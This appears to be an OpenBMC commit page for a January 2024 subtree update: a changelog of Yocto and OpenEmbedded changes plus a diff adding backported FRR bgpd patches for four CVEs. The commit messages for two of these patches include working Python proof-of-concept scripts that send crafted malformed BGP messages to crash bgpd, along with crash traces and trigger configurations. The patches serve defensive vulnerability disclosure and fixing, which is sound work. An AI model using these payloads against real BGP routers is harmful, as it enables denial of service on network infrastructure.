diff options
author | Andrew Geissler <geissonator@yahoo.com> | 2024-01-11 20:55:23 +0300 |
---|---|---|
committer | Andrew Geissler <geissonator@yahoo.com> | 2024-01-11 20:56:06 +0300 |
commit | d4fa64b8fbad9ed7bef03090adec4a99cf9ecd5b (patch) | |
tree | cd2f355c9c8ae01d490e733e8c83d86f89e92bc8 /meta-openembedded | |
parent | 06a6d53090fbf4da09a79d24c2147c5d78640b0c (diff) | |
download | openbmc-d4fa64b8fbad9ed7bef03090adec4a99cf9ecd5b.tar.xz |
subtree updates:nanbield: Jan 11, 2024
poky: bf9f2f6f60..61a59d00a0:
Adam Johnston (1):
useradd_base: Fix sed command line for passwd-expire
Alexander Kanavin (1):
cmake: upgrade 3.27.5 -> 3.27.7
Anuj Mittal (1):
gstreamer1.0: upgrade 1.22.6 -> 1.22.7
Bastian Krause (1):
linux-firmware: add new fw file to ${PN}-rtl8821
Bruce Ashfield (25):
linux-yocto/6.1: update to v6.1.59
linux-yocto/6.1: update to v6.1.60
linux-yocto/6.5: update to v6.5.8
linux-yocto/6.5: update to v6.5.9
kern-tools: make lower context patches reproducible
kern-tools: bump SRCREV for queue processing changes
kern-tools: update SRCREV to include SECURITY.md file
kernel-yocto: improve metadata patching
linux-yocto/6.1: cfg: restore CONFIG_DEVMEM
linux-yocto/6.1: update to v6.1.61
linux-yocto/6.1: update to v6.1.62
linux-yocto/6.1: update to v6.1.65
linux-yocto/6.5: cfg: restore CONFIG_DEVMEM
linux-yocto/6.5: update to v6.5.10
linux-yocto/6.5: cfg: split runtime and symbol debug
linux-yocto/6.5: update to v6.5.11
linux-yocto/6.5: update to v6.5.12
linux-yocto/6.5: update to v6.5.13
linux-yocto/6.1: drop removed IMA option
linux-yocto-rt/6.1: update to -rt18
linux-yocto/6.1: update to v6.1.66
linux-yocto/6.1: update to v6.1.67
linux-yocto/6.1: update to v6.1.68
linux-yocto/6.5: drop removed IMA option
linux-yocto/6.5: fix AB-INT: QEMU kernel panic: No irq handler for vector
Chen Qi (1):
systemd: fix DynamicUser issue
Deepthi Hemraj (1):
rust: Fix CVE-2023-40030
Dhairya Nagodra (2):
cve-update-nvd2-native: faster requests with API keys
cve-update-nvd2-native: increase the delay between subsequent request failures
Dmitry Baryshkov (9):
linux-firmware: upgrade 20230804 -> 20231030
linux-firmware: add missing depenencies on license packages
linux-firmware: add notice file to sdm845 modem firmware
linux-firmware: add audio topology symlink to the X13's audio package
linux-firmware: package firmware for Qualcomm Adreno a702
linux-firmware: package firmware for Qualcomm QCM2290 / QRB4210
linux-firmware: package Qualcomm Venus 6.0 firmware
linux-firmware: package Robotics RB5 sensors DSP firmware
meson: use correct targets for rust binaries
Fahad Arslan (1):
linux-firmware: create separate packages
Javier Tia (1):
kernel-arch: use ccache only for compiler
Jermain Horsman (2):
lib/oe/buildcfg.py: Include missing import
lib/oe/buildcfg.py: Remove unused parameter
Joakim Tjernlund (1):
sed -i destroys symlinks
Joshua Watt (1):
bitbake: asyncrpc: Add context manager API
Julien Stephan (2):
devtool: fix update-recipe dry-run mode
devtool: finish/update-recipe: restrict mode srcrev to recipes fetched from SCM
Justin Bronder (1):
contributor-guide: add License-Update tag
Khem Raj (1):
python3-urllib3: Upgrade to 2.0.7
Lee Chee Yang (10):
migration-guides: add release notes for 4.3.1
migration-guide: add release notes for 4.2.4
migration-guide: add release notes for 4.0.14
migration-guides: reword fix in release-notes-4.3.1
migration-guides: add release notes for 4.0.15
avahi: add CVE-2023-38473.patch to SRC_URL
grub: fix CVE-2023-4692 CVE-2023-4693
curl: fix CVE-2023-46218
perlcross: update to 1.5.2
perl: 5.38.0 -> 5.38.2
Marco Felsch (1):
json-c: fix icecc compilation
Markus Volk (3):
gtk: Add rdepend on printbackend for cups
bluez5: fix connection for ps5/dualshock controllers
cups: Add root,sys,wheel to system groups
Marta Rybczynska (1):
bitbake: toastergui: verify that an existing layer path is given
Massimiliano Minella (1):
systemd: update LICENSE statement
Michael Opdenacker (14):
migration-guides: release 3.5 is actually 4.0
contributor-guide: fix command option
dev-manual: layers: update link to YP Compatible form
ref-manual: releases.svg: update nanbield release status
manuals: fix URL
test-manual: text and formatting fixes
test-manual: resource updates
test-manual: add links to python unittest
test-manual: explicit or fix file paths
test-manual: add or improve hyperlinks
dev-manual: runtime-testing: fix test module name
test-manual: use working example
systemd-compat-units.bb: fix postinstall script
ref-manual: update tested and supported distros
Paul Barker (1):
ref-manual: Fix reference to MIRRORS/PREMIRRORS defaults
Peter Kjellerstedt (3):
oeqa/selftest/tinfoil: Add tests that parse virtual recipes
dev-manual: Discourage the use of SRC_URI[md5sum]
bitbake: command: Make parseRecipeFile() handle virtual recipes correctly
Peter Marko (2):
cve-update-nvd2-native: remove unused variable CVE_SOCKET_TIMEOUT
cve-update-nvd2-native: make number of fetch attemtps configurable
Randy MacLeod (1):
strace: backport fix for so_peerpidfd-test
Rasmus Villemoes (1):
perf: lift TARGET_CC_ARCH modification out of security_flags.inc
Richard Purdie (7):
qemu: Upgrade 8.1.0 -> 8.1.2
sstate: Ensure sstate searches update file mtime
testimage: Exclude wtmp from target-dumper commands
bitbake: lib/bb: Add workaround for libgcc issues with python 3.8 and 3.9
linux/cve-exclusion6.1: Update to latest kernel point release
package_ipk: Fix Source: field variable dependency
testimage: Drop target_dumper and most of monitor_dumper
Ross Burton (6):
xwayland: upgrade to 23.2.2
linux-yocto: update CVE exclusions
linux-yocto: update CVE exclusions
lib/oe/patch: ensure os.chdir restoring always happens
tcl: skip timing-dependent tests in run-ptest
tcl: skip async and event tests in run-ptest
Shubham Kulkarni (1):
tzdata: Upgrade to 2023d
Simone Weiß (1):
manuals: brief-yoctoprojectqs: align variable order with default local.conf
Steve Sakoman (2):
poky.conf: bump version for 4.3.2 release
build-appliance-image: Update to nanbield head revision
Sundeep KOKKONDA (2):
glibc: stable 2.38 branch updates
binutils: stable 2.41 branch updates
Tim Orling (2):
lsb-release: use https for UPSTREAM_CHECK_URI
vim: upgrade 9.0.2068 -> 9.0.2130
Trevor Gamblin (2):
python3-ptest: skip test_storlines
patchtest: shorten patch signed-off-by test output
Vijay Anusuri (1):
avahi: backport Debian patches to fix multiple CVE's
Viswanath Kraleti (1):
systemd-boot: Fix build issues on armv7a-linux
Vyacheslav Yurkov (1):
lib/oe/path: Deploy files can start only with a dot
Wang Mingyu (16):
base-passwd: upgrade 3.6.1 -> 3.6.2
enchant2: upgrade 2.6.1 -> 2.6.2
harfbuzz: upgrade 8.2.1 -> 8.2.2
libjpeg-turbo: upgrade 3.0.0 -> 3.0.1
libnewt: upgrade 0.52.23 -> 0.52.24
libnsl2: upgrade 2.0.0 -> 2.0.1
msmtp: upgrade 1.8.24 -> 1.8.25
glib-2.0: upgrade 2.78.0 -> 2.78.1
xserver-xorg: upgrade 21.1.8 -> 21.1.9
ghostscript: upgrade 10.02.0 -> 10.02.1
libsolv: upgrade 0.7.25 -> 0.7.26
bind: upgrade 9.18.19 -> 9.18.20
ell: upgrade 0.59 -> 0.60
libgcrypt: upgrade 1.10.2 -> 1.10.3
libxslt: upgrade 1.1.38 -> 1.1.39
log4cplus: upgrade 2.1.0 -> 2.1.1
William Lyu (1):
openssl: improve handshake test error reporting
Zoltán Böszörményi (1):
update_gtk_icon_cache: Fix for GTK4-only builds
meta-raspberrypi: 8231f97534..fde68b24f0:
Lorenzo Arena (1):
docs: fix syntax for overriding fs type for initramfs image
meta-openembedded: 1750c66ae8..2da6e1b0e4:
Alexandre Belloni (1):
poco: fix branch
Christian Eggers (1):
python3-gcovr: switch to main branch
Dylan Turner (1):
apache2: v2.4.57 to v2.4.58 to fix CVE-2023-43622
Edi Feschiyan (1):
libbytesize: update SRC_URI
Fabio Estevam (3):
openocd: Use https for github
python3-piccata: Use https for github
multipath-tools: Use https for github
Jeffrey Pautler (1):
apache2: add vendor to product name used for CVE checking
Jonas Gorski (1):
frr: fix CVEs CVE-2023-4675{2,3} and CVE-2023-4723{4,5}
Khem Raj (3):
hwdata: upgrade 0.370 -> 0.375
openvpn: upgrade 2.6.3 -> 2.6.6
python3-scapy: upgrade to latest revision
Ross Burton (1):
yajl: fix CVE-2017-16516, CVE-2022-24795, CVE-2023-33460
Wang Mingyu (3):
hdf5: Fix install conflict when enable multilib.
dnf-plugin-tui: Recover BBCLASSEXTEND variants
strongswan: upgrade 5.9.11 -> 5.9.12
Zoltán Böszörményi (3):
python3-ninja-syntax: Set BBCLASSEXTEND = "native nativesdk"
python3-ninja: Set BBCLASSEXTEND = "native nativesdk"
geos: Fix packaging
meta-arm: 0bd7fece41..79c52afe74:
Debbie Martin (2):
arm-systemready: Add parted dependency and inherit testimage
ci: Add Arm SystemReady firmware and IR ACS builds
Harsimran Singh Tungal (1):
arm-bsp/documentation: corstone1000: fix the steps in the user guide and instructions
Change-Id: I9e8e09b85674d653415c01932a5f7a3cbeca877e
Signed-off-by: Andrew Geissler <geissonator@yahoo.com>
Diffstat (limited to 'meta-openembedded')
26 files changed, 617 insertions, 50 deletions
diff --git a/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb b/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb index cc3f2ee1dd..4858e4e579 100644 --- a/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb +++ b/meta-openembedded/meta-networking/recipes-devtools/python/python3-scapy_2.5.0.bb @@ -16,7 +16,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=b234ee4d69f5fce4486a80fdaf4a4263" # If you want ptest support, use the git repo # UTscapy does not exist in the pypi pkg # -SRCREV = "9473f77d8b548c8e478e52838bdd4c12f5d4f4ff" +SRCREV = "0474c37bf1d147c969173d52ab3ac76d2404d981" SRC_URI = "git://github.com/secdev/scapy.git;branch=master;protocol=https \ file://run-ptest" diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch new file mode 100644 index 0000000000..e1f30248ca --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46752.patch @@ -0,0 +1,125 @@ +From b08afc81c60607a4f736f418f2e3eb06087f1a35 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Fri, 20 Oct 2023 17:49:18 +0300 +Subject: [PATCH] bgpd: Handle MP_REACH_NLRI malformed packets with session + reset + +Avoid crashing bgpd. + +``` +(gdb) +bgp_mp_reach_parse (args=<optimized out>, mp_update=0x7fffffffe140) at bgpd/bgp_attr.c:2341 +2341 stream_get(&attr->mp_nexthop_global, s, IPV6_MAX_BYTELEN); +(gdb) +stream_get (dst=0x7fffffffe1ac, s=0x7ffff0006e80, size=16) at lib/stream.c:320 +320 { +(gdb) +321 STREAM_VERIFY_SANE(s); +(gdb) +323 if (STREAM_READABLE(s) < size) { +(gdb) +34 return __builtin___memcpy_chk (__dest, __src, __len, __bos0 (__dest)); +(gdb) + +Thread 1 "bgpd" received signal SIGSEGV, Segmentation fault. +0x00005555556e37be in route_set_aspath_prepend (rule=0x555555aac0d0, prefix=0x7fffffffe050, + object=0x7fffffffdb00) at bgpd/bgp_routemap.c:2282 +2282 if (path->attr->aspath->refcnt) +(gdb) +``` + +With the configuration: + +``` + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + address-family ipv4 unicast + redistribute connected + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/b08afc81c60607a4f736f418f2e3eb06087f1a35] +CVE: CVE-2023-46752 +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_attr.c | 6 +----- + bgpd/bgp_attr.h | 1 - + bgpd/bgp_packet.c | 6 +----- + 3 files changed, 2 insertions(+), 11 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 6925aff727e2..e7bb42a5d989 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -2421,7 +2421,7 @@ int bgp_mp_reach_parse(struct bgp_attr_parser_args *args, + + mp_update->afi = afi; + mp_update->safi = safi; +- return BGP_ATTR_PARSE_EOR; ++ return bgp_attr_malformed(args, BGP_NOTIFY_UPDATE_MAL_ATTR, 0); + } + + mp_update->afi = afi; +@@ -3759,10 +3759,6 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + goto done; + } + +- if (ret == BGP_ATTR_PARSE_EOR) { +- goto done; +- } +- + if (ret == BGP_ATTR_PARSE_ERROR) { + flog_warn(EC_BGP_ATTRIBUTE_PARSE_ERROR, + "%s: Attribute %s, parse error", peer->host, +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index 961e5f122470..fc347e7a1b4b 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -364,7 +364,6 @@ enum bgp_attr_parse_ret { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, +- BGP_ATTR_PARSE_EOR = -4, + }; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index b585591e2f69..5ecf343b6657 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -2397,8 +2397,7 @@ static int bgp_update_receive(struct peer_connection *connection, + * Non-MP IPv4/Unicast EoR is a completely empty UPDATE + * and MP EoR should have only an empty MP_UNREACH + */ +- if ((!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) +- || (attr_parse_ret == BGP_ATTR_PARSE_EOR)) { ++ if (!update_len && !withdraw_len && nlris[NLRI_MP_UPDATE].length == 0) { + afi_t afi = 0; + safi_t safi; + struct graceful_restart_info *gr_info; +@@ -2419,9 +2418,6 @@ static int bgp_update_receive(struct peer_connection *connection, + && nlris[NLRI_MP_WITHDRAW].length == 0) { + afi = nlris[NLRI_MP_WITHDRAW].afi; + safi = nlris[NLRI_MP_WITHDRAW].safi; +- } else if (attr_parse_ret == BGP_ATTR_PARSE_EOR) { +- afi = nlris[NLRI_MP_UPDATE].afi; +- safi = nlris[NLRI_MP_UPDATE].safi; + } + + if (afi && peer->afc[afi][safi]) { +-- +2.42.1 + diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch new file mode 100644 index 0000000000..6bf159aba8 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-46753.patch @@ -0,0 +1,117 @@ +From d8482bf011cb2b173e85b65b4bf3d5061250cdb9 Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Mon, 23 Oct 2023 23:34:10 +0300 +Subject: [PATCH] bgpd: Check mandatory attributes more carefully for UPDATE + message + +If we send a crafted BGP UPDATE message without mandatory attributes, we do +not check if the length of the path attributes is zero or not. We only check +if attr->flag is at least set or not. Imagine we send only unknown transit +attribute, then attr->flag is always 0. Also, this is true only if graceful-restart +capability is received. + +A crash: + +``` +bgpd[7834]: [TJ23Y-GY0RH] 127.0.0.1 Unknown attribute is received (type 31, length 16) +bgpd[7834]: [PCFFM-WMARW] 127.0.0.1(donatas-pc) rcvd UPDATE wlen 0 attrlen 20 alen 17 +BGP[7834]: Received signal 11 at 1698089639 (si_addr 0x0, PC 0x55eefd375b4a); aborting... +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_backtrace_sigsafe+0x6d) [0x7f3205ca939d] +BGP[7834]: /usr/local/lib/libfrr.so.0(zlog_signal+0xf3) [0x7f3205ca9593] +BGP[7834]: /usr/local/lib/libfrr.so.0(+0xf5181) [0x7f3205cdd181] +BGP[7834]: /lib/x86_64-linux-gnu/libpthread.so.0(+0x12980) [0x7f3204ff3980] +BGP[7834]: /usr/lib/frr/bgpd(+0x18ab4a) [0x55eefd375b4a] +BGP[7834]: /usr/local/lib/libfrr.so.0(route_map_apply_ext+0x310) [0x7f3205cd1290] +BGP[7834]: /usr/lib/frr/bgpd(+0x163610) [0x55eefd34e610] +BGP[7834]: /usr/lib/frr/bgpd(bgp_update+0x9a5) [0x55eefd35c1d5] +BGP[7834]: /usr/lib/frr/bgpd(bgp_nlri_parse_ip+0xb7) [0x55eefd35e867] +BGP[7834]: /usr/lib/frr/bgpd(+0x1555e6) [0x55eefd3405e6] +BGP[7834]: /usr/lib/frr/bgpd(bgp_process_packet+0x747) [0x55eefd345597] +BGP[7834]: /usr/local/lib/libfrr.so.0(event_call+0x83) [0x7f3205cef4a3] +BGP[7834]: /usr/local/lib/libfrr.so.0(frr_run+0xc0) [0x7f3205ca10a0] +BGP[7834]: /usr/lib/frr/bgpd(main+0x409) [0x55eefd2dc979] +``` + +Sending: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff003c0200000014ff1f001000040146464646460004464646464646664646f50d05800100010200ffff000000") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(1000) +s.close() +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/d8482bf011cb2b173e85b65b4bf3d5061250cdb9] +CVE: CVE-2023-46753 +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_attr.c | 10 ++++++---- + 1 file changed, 6 insertions(+), 4 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index e7bb42a5d989..cf2dbe65b805 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3385,13 +3385,15 @@ bgp_attr_unknown(struct bgp_attr_parser_args *args) + } + + /* Well-known attribute check. */ +-static int bgp_attr_check(struct peer *peer, struct attr *attr) ++static int bgp_attr_check(struct peer *peer, struct attr *attr, ++ bgp_size_t length) + { + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an + * empty UPDATE. */ +- if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag) ++ if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && ++ !length) + return BGP_ATTR_PARSE_PROCEED; + + /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +@@ -3443,7 +3445,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + enum bgp_attr_parse_ret ret; + uint8_t flag = 0; + uint8_t type = 0; +- bgp_size_t length; ++ bgp_size_t length = 0; + uint8_t *startp, *endp; + uint8_t *attr_endp; + uint8_t seen[BGP_ATTR_BITMAP_SIZE]; +@@ -3831,7 +3833,7 @@ enum bgp_attr_parse_ret bgp_attr_parse(struct peer *peer, struct attr *attr, + } + + /* Check all mandatory well-known attributes are present */ +- ret = bgp_attr_check(peer, attr); ++ ret = bgp_attr_check(peer, attr, length); + if (ret < 0) + goto done; + +-- +2.42.1 + diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch new file mode 100644 index 0000000000..754f9345a0 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47234.patch @@ -0,0 +1,95 @@ +From c37119df45bbf4ef713bc10475af2ee06e12f3bf Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Sun, 29 Oct 2023 22:44:45 +0200 +Subject: [PATCH] bgpd: Ignore handling NLRIs if we received MP_UNREACH_NLRI + +If we receive MP_UNREACH_NLRI, we should stop handling remaining NLRIs if +no mandatory path attributes received. + +In other words, if MP_UNREACH_NLRI received, the remaining NLRIs should be handled +as a new data, but without mandatory attributes, it's a malformed packet. + +In normal case, this MUST not happen at all, but to avoid crashing bgpd, we MUST +handle that. + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/c37119df45bbf4ef713bc10475af2ee06e12f3bf] +CVE: CVE-2023-47234 +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_attr.c | 19 ++++++++++--------- + bgpd/bgp_attr.h | 1 + + bgpd/bgp_packet.c | 7 ++++++- + 3 files changed, 17 insertions(+), 10 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index 1473dc772502..75aa2ac7cce6 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3399,15 +3399,6 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + !length) + return BGP_ATTR_PARSE_WITHDRAW; + +- /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required +- to carry any other path attributes.", though if MP_REACH_NLRI or NLRI +- are present, it should. Check for any other attribute being present +- instead. +- */ +- if ((!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && +- CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI)))) +- return BGP_ATTR_PARSE_PROCEED; +- + if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_ORIGIN))) + type = BGP_ATTR_ORIGIN; + +@@ -3426,6 +3417,16 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + && !CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_LOCAL_PREF))) + type = BGP_ATTR_LOCAL_PREF; + ++ /* An UPDATE message that contains the MP_UNREACH_NLRI is not required ++ * to carry any other path attributes. Though if MP_REACH_NLRI or NLRI ++ * are present, it should. Check for any other attribute being present ++ * instead. ++ */ ++ if (!CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_REACH_NLRI)) && ++ CHECK_FLAG(attr->flag, ATTR_FLAG_BIT(BGP_ATTR_MP_UNREACH_NLRI))) ++ return type ? BGP_ATTR_PARSE_MISSING_MANDATORY ++ : BGP_ATTR_PARSE_PROCEED; ++ + /* If any of the well-known mandatory attributes are not present + * in an UPDATE message, then "treat-as-withdraw" MUST be used. + */ +diff --git a/bgpd/bgp_attr.h b/bgpd/bgp_attr.h +index fc347e7a1b4b..d30155e6dba0 100644 +--- a/bgpd/bgp_attr.h ++++ b/bgpd/bgp_attr.h +@@ -364,6 +364,7 @@ enum bgp_attr_parse_ret { + /* only used internally, send notify + convert to BGP_ATTR_PARSE_ERROR + */ + BGP_ATTR_PARSE_ERROR_NOTIFYPLS = -3, ++ BGP_ATTR_PARSE_MISSING_MANDATORY = -4, + }; + + struct bpacket_attr_vec_arr; +diff --git a/bgpd/bgp_packet.c b/bgpd/bgp_packet.c +index a7514a26aa64..5dc35157ebf6 100644 +--- a/bgpd/bgp_packet.c ++++ b/bgpd/bgp_packet.c +@@ -2359,7 +2359,12 @@ static int bgp_update_receive(struct peer_connection *connection, + /* Network Layer Reachability Information. */ + update_len = end - stream_pnt(s); + +- if (update_len && attribute_len) { ++ /* If we received MP_UNREACH_NLRI attribute, but also NLRIs, then ++ * NLRIs should be handled as a new data. Though, if we received ++ * NLRIs without mandatory attributes, they should be ignored. ++ */ ++ if (update_len && attribute_len && ++ attr_parse_ret != BGP_ATTR_PARSE_MISSING_MANDATORY) { + /* Set NLRI portion to structure. */ + nlris[NLRI_UPDATE].afi = AFI_IP; + nlris[NLRI_UPDATE].safi = SAFI_UNICAST; +-- +2.42.1 + diff --git a/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch new file mode 100644 index 0000000000..b06ba94a34 --- /dev/null +++ b/meta-openembedded/meta-networking/recipes-protocols/frr/frr/CVE-2023-47235.patch @@ -0,0 +1,112 @@ +From 6814f2e0138a6ea5e1f83bdd9085d9a77999900b Mon Sep 17 00:00:00 2001 +From: Donatas Abraitis <donatas@opensourcerouting.org> +Date: Fri, 27 Oct 2023 11:56:45 +0300 +Subject: [PATCH] bgpd: Treat EOR as withdrawn to avoid unwanted handling of + malformed attrs + +Treat-as-withdraw, otherwise if we just ignore it, we will pass it to be +processed as a normal UPDATE without mandatory attributes, that could lead +to harmful behavior. In this case, a crash for route-maps with the configuration +such as: + +``` +router bgp 65001 + no bgp ebgp-requires-policy + neighbor 127.0.0.1 remote-as external + neighbor 127.0.0.1 passive + neighbor 127.0.0.1 ebgp-multihop + neighbor 127.0.0.1 disable-connected-check + neighbor 127.0.0.1 update-source 127.0.0.2 + neighbor 127.0.0.1 timers 3 90 + neighbor 127.0.0.1 timers connect 1 + ! + address-family ipv4 unicast + neighbor 127.0.0.1 addpath-tx-all-paths + neighbor 127.0.0.1 default-originate + neighbor 127.0.0.1 route-map RM_IN in + exit-address-family +exit +! +route-map RM_IN permit 10 + set as-path prepend 200 +exit +``` + +Send a malformed optional transitive attribute: + +``` +import socket +import time + +OPEN = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\x00\x62\x01\x04\xfd\xea\x00\x5a\x0a\x00\x00\x01\x45\x02" +b"\x06\x01\x04\x00\x01\x00\x01\x02\x02\x02\x00\x02\x02\x46\x00\x02" +b"\x06\x41\x04\x00\x00\xfd\xea\x02\x02\x06\x00\x02\x06\x45\x04\x00" +b"\x01\x01\x03\x02\x0e\x49\x0c\x0a\x64\x6f\x6e\x61\x74\x61\x73\x2d" +b"\x70\x63\x00\x02\x04\x40\x02\x00\x78\x02\x09\x47\x07\x00\x01\x01" +b"\x80\x00\x00\x00") + +KEEPALIVE = (b"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff" +b"\xff\xff\xff\xff\xff\xff\x00\x13\x04") + +UPDATE = bytearray.fromhex("ffffffffffffffffffffffffffffffff002b0200000003c0ff00010100eb00ac100b0b001ad908ac100b0b") + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.connect(('127.0.0.2', 179)) +s.send(OPEN) +data = s.recv(1024) +s.send(KEEPALIVE) +data = s.recv(1024) +s.send(UPDATE) +data = s.recv(1024) +time.sleep(100) +s.close() +``` + +Reported-by: Iggy Frankovic <iggyfran@amazon.com> +Signed-off-by: Donatas Abraitis <donatas@opensourcerouting.org> +Upstream-Status: Backport [https://github.com/FRRouting/frr/commit/6814f2e0138a6ea5e1f83bdd9085d9a77999900b] +CVE: CVE-2023-47235 +Signed-off-by: Jonas Gorski <jonas.gorski@bisdn.de> +--- + bgpd/bgp_attr.c | 15 ++++++++++++--- + 1 file changed, 12 insertions(+), 3 deletions(-) + +diff --git a/bgpd/bgp_attr.c b/bgpd/bgp_attr.c +index cf2dbe65b805..1473dc772502 100644 +--- a/bgpd/bgp_attr.c ++++ b/bgpd/bgp_attr.c +@@ -3391,10 +3391,13 @@ static int bgp_attr_check(struct peer *peer, struct attr *attr, + uint8_t type = 0; + + /* BGP Graceful-Restart End-of-RIB for IPv4 unicast is signaled as an +- * empty UPDATE. */ ++ * empty UPDATE. Treat-as-withdraw, otherwise if we just ignore it, ++ * we will pass it to be processed as a normal UPDATE without mandatory ++ * attributes, that could lead to harmful behavior. ++ */ + if (CHECK_FLAG(peer->cap, PEER_CAP_RESTART_RCV) && !attr->flag && + !length) +- return BGP_ATTR_PARSE_PROCEED; ++ return BGP_ATTR_PARSE_WITHDRAW; + + /* "An UPDATE message that contains the MP_UNREACH_NLRI is not required + to carry any other path attributes.", though if MP_REACH_NLRI or NLRI +@@ -3889,7 +3892,13 @@ done: + aspath_unintern(&as4_path); + + transit = bgp_attr_get_transit(attr); +- if (ret != BGP_ATTR_PARSE_ERROR) { ++ /* If we received an UPDATE with mandatory attributes, then ++ * the unrecognized transitive optional attribute of that ++ * path MUST be passed. Otherwise, it's an error, and from ++ * security perspective it might be very harmful if we continue ++ * here with the unrecognized attributes. ++ */ ++ if (ret == BGP_ATTR_PARSE_PROCEED) { + 